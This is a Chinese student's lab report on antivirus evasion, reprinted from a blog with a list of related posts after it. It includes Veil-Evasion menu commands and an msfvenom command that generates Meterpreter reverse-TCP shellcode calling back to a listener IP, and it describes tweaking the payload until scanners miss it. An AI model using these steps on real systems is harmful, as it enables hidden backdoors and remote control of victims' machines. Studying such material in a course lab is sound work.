20145212 罗天晨 免杀原理与实践


一、基础问题回答

1.杀软是如何检测出恶意代码的?

  • (1)恶意代码有其特有的特征码,杀软将特征码加入检测库中,当检测到一段代码中具有这样的特征码时就可以判断为恶意代码。
  • (2)为了防止自身特征码被检测,有些恶意代码使用了免杀加壳软件进行加壳,一些流行的加壳软件已经可以检查出来,如果被这样的加壳软件加壳就可能是恶意代码。
  • (3)判断该代码是否有恶意行为,若有就会判断代码是恶意代码。

2.免杀是做什么的?

  • 通过各种手段免除计算机对恶意代码查杀即为免杀。

3.免杀的基本方法有哪些?

  • (1)通过改变自身特征码

    • 加壳(可以选择比较新的、冷门的壳,流行的已经可以被大多数杀毒软件查杀)
    • 进行异或、逆序或者其他手段改变自身特征码。
  • (2)通过改变软件攻击的行为
    • 在看似正常的应用中插入恶意代码,当程序运行时看似正常,可以逃过查杀。
    • 可以使用反弹端口技术,这样看上去就像是靶机在主动链接ip,大大减低被查杀的风险。
    • 使用隧道技术。

二、实践总结与体会

小时候看到我的杀软跳出红色界面报毒的时候感觉可安全了……现在才知道那时候有多天真,稍作修饰我们就可以自己制作一个免杀的恶意代码,只要植入靶机那很多东西都会一览无余。
像在这次实验中,只是稍作修改,连我自己都可以做出骗过我所安装的360杀毒软件的病毒程序,可见其实我们的电脑及其不安全。
另外我看了看其他同学的博客,有说其实在VirSCAN里显示的数据并不一定准确,有的病毒在VirSCAN中扫描未查杀,但是在本机电脑杀毒软件中就报毒了,可见及时的更新自己的杀毒软件,保持最新病毒库还是很重要的。


三、离实战还缺些什么技术或步骤?

  • 1.如何将我们制作的后门程序传到靶机上
  • 2.如何让靶机运行这个看起来不知道有什么用途的程序…
  • 3.如何保证自己的主机ip地址不变,随时随地都可以进行攻击

四、实践过程记录

  • 先对上周生成的木马程序进行检测:

(一)改变特征码实现免杀

  • 进行编码之后再检查:

    可以看出并没有什么变化,因为编码器本身和其模板有属于自己的特征码,杀毒软件会检查出来。

(二)Veil-Evasion

  • 老师给的kali机中带有这个软件,可以直接在命令行中输入veil-evasion打开
  • 在菜单中依次输入以下命令:
    use python/meterpreter/rev_tcp
    set LHOST + 本机ip地址
    generate
  • 之后输入生成的文件名称,选择1:
  • 传送到windows主机上贴到页面中进行扫描:可以看出比起之前的病毒,这个稍微难被查杀出来一些,但是还是可以判断是病毒

(三)使用C语言调用的shellcode制作一个半手工的病毒

  • 在kali上输入以下命令生成一段码:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.212 LPORT=5212 -f c

  • 之后就是把这段十六进制码贴到VS中,根据老师给出的模板编译生成文件。

  • 对生成的码进行一些小小的改变(不做多余赘述啦),然后将生成的文件放上virSCAN测试:


    两个报毒

  • 啊……对这个文件使用360云查杀:

  • 进行回连实测:试运行这个病毒,成功的执行如下

转载于:https://www.cnblogs.com/alovera/p/6587447.html

20145212 罗天晨 免杀原理与实践相关推荐

  1. 2018-2019-2 网络对抗技术 20165239Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165239 Exp3 免杀原理与实践 win10 ip地址 192.168.18.1 fenix ip地址为 192.168.18.128 (1)杀软是如何 ...

  2. 20155222卢梓杰 实验三 免杀原理与实践

    实验三 免杀原理与实践 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 实验步骤如下 1.先对实验二中生 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...

  4. 20145317 《网络对抗技术》免杀原理与实践

    20145317 <网络对抗技术>免杀原理与实践 免杀技术 技术分类 改变特征码 加壳:使用专业的加壳软件,掩盖特征码: 使用encode等进行编码,进行异或.+1.-1等类似操作改变特征 ...

  5. 20155301实验三 免杀原理与实践

    20155301实验三 免杀原理与实践 实验内容 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧: 2 ...

  6. 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践

    目录 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践 实验内容 基础问题回答 实践过程记录 任务一:正确使用免杀工具或技巧 任务二:通过组合应用各种技术实现恶意代码免杀 任务 ...

  7. 20164301 Exp3 免杀原理与实践

    Exp3 免杀原理与实践  1. 实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应 ...

  8. 2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践

    2018-2019-2 20165209 <网络对抗技术>Exp3:免杀原理与实践 1 免杀原理与实验内容 1.1 免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中 ...

  9. 20165223《网络对抗技术》Exp3 免杀原理与实践

    目录 -- 免杀原理与实践 免杀原理与实践 本次实验任务 基础知识问答 免杀扫描引擎 实验内容 正确使用msf编码器,msfvenom生成jar等文件,veil-evasion,加壳工具,使用shel ...

最新文章

  1. 深度优先搜索_0基础学算法 搜索篇第一讲 深度优先搜索
  2. 2017-07-18日看登录日志,显示十条:最早的是:2014-04-07 17:09,应该就是注册日期吧
  3. MySQL入门篇(一)之MySQL部署
  4. arcgis for android离线编辑,操作方法:直接从 Android 或 iOS 设备访问 Collector for ArcGIS 中的离线编辑内容...
  5. 深入理解JavaScript的事件循环
  6. 雨滴桌面时间插件_Win10美化向——如何搭配你的桌面
  7. UVALive 7455 Linear Ecosystem (高斯消元)
  8. python生成list的时候 可以用lamda也可以不用_python 可迭代对象,迭代器和生成器,lambda表达式...
  9. 光栅图形学算法基础其二 (裁剪算法)
  10. Globe宣布将在Balancer拍卖14,000,000枚GDT代币
  11. 三角形面积 java_java编程中求三角形面积肿么写?
  12. 一步一步SharePoint 2007之二十八:实现WebPart的单步调试
  13. 笨方法教你学python_笨方法学Python(1)
  14. 默认smtp虚拟服务器,轻松架设自己的SMTP服务器
  15. 机器学习系列(2)_数据分析之Kaggle电影TMDB5000
  16. matlab2021安装教程
  17. Java网络编程之实现资源下载详解【王道Java】
  18. mapStateToProps,mapDispatchToProps的使用详解
  19. java段落对齐_Java 设置Word段落缩进、对齐方式
  20. 闰秒(leapsecond)和原子钟(Atomic Clock)究竟是什么

热门文章

  1. 知云文献翻译 for mac
  2. table和div的比较
  3. Problem:Ubuntu Give up waiting for root device
  4. 《电机学》第三篇 第10、11、12章 交流旋转电机的共同问题
  5. logback prudent, SiftingAppender, layout, encoder的使用
  6. 韩信点兵python程序_韩信点兵计算公式与代码
  7. (CVPR-2022)AdaViT:用于高效图像识别的自适应视觉变换器
  8. usermode linux网络空间,(RHCE笔记)linux基础之三 用户、组及权限
  9. wifi 验证加密 总结
  10. (27)python类的定义和使用